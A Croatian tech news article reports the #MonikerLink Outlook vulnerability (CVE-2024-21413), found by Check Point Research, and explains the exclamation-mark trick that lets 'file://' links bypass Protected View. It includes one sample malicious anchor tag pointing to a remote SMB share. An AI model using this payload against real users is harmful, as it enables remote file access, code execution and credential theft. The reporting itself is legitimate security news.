Jedan uskličnik (!) otvara veliku ranjivost u Outlooku
Sigurnosni stručnjaci otkrili su, a Microsoft potvrdio, da se u određenim inačicama Outlooka već desetljećima nalazi propust, koji omogućava lako zaobilaženje sigurnosnih protokola
Već desetljećima u Microsoftovom se popularnom uredskom e-mail klijentu Outlooku nalazi neotkriveni sigurnosni propust, koji može imati ozbiljne posljedice po sve korisnike. Sigurnosni stručnjaci kompanije Check Point Research otkrili su, naime, propust nazvan #MonikerLink te potvrdili da se on aktivno koristi, a da tvorci softvera za njega ne znaju.
Ovaj "zero day" propust omogućava vrlo jednostavan vektor napada, a potvrđeno je i da postoji u najnovijim verzijama Windowsa 10 i 11, na kojima je instaliran Microsoft 365 (Office 2021). Isti propust, sada službene oznake CVE-2024-21413, primijećen je i u starijim inačicama uredskog paketa aplikacija (Office 2016, Office 2019, Office LTSC 2021, Microsoft 365 Apps for Enterprise). Microsoft je potvrdio postojanje sigurnosne rupe.
Uskličnikom do napada
Na stranicama Check Point Researcha objavljeni su i detalji otkrića. Njihovi stručnjaci pišu da je riječ o "zanimljivom" načinu obrade određenih hiperlinkova poslanih putem elektroničke pošte. Ako link u e-mailu započinje s "file://", odnosno upućuje na protokol za pristup udaljenim datotekama, moguće ga je preraditi tako da se on otvara, bez obzira na sigurnosne rizike.
Outlook će tada zanemariti svoja sigurnosna ograničenja i dozvoliti izravno otvaranje udaljene datoteke, što pak otvara prostor za razne manipulacije, instalaciju malicioznog softvera, izvođenje naredbi na daljinu i slične napade. Ono ključno – kako preraditi "file://" link u nešto što će Outlook rado otvoriti – prozaično je i nevjerojatno jednostavno. Sve što treba učiniti jest u link dodati jedan jedini uskličnik na kraju URL-a.
Primjer "začinjenog" linka – primijetite uskličnik:
*<a href="file:///\\10.10.111.111\test\test.rtf!something">CLICK ME</a>*
Klikanje na takvu poveznicu u Outlooku zaobilazi sigurnosne provjere, čak i ako je primljena pošta otvorena u tzv. "Protected View", odnosno načinu rada koji onemogućava otvaranje poveznica.
Stručnjaci, koji su otkrili neobičan problem, o svemu su izvijestili Microsoft, ali navode i da je moguće da se #MonikerLink bug nalazi i u nekim drugim alatima i aplikacijama. Microsoft će automatski zakrpati Outlook nadolazećom redovitom nadogradnjom u sklopu Patch Tuesdaya, a zakrpe su dostupne i na njihovim stranicama.
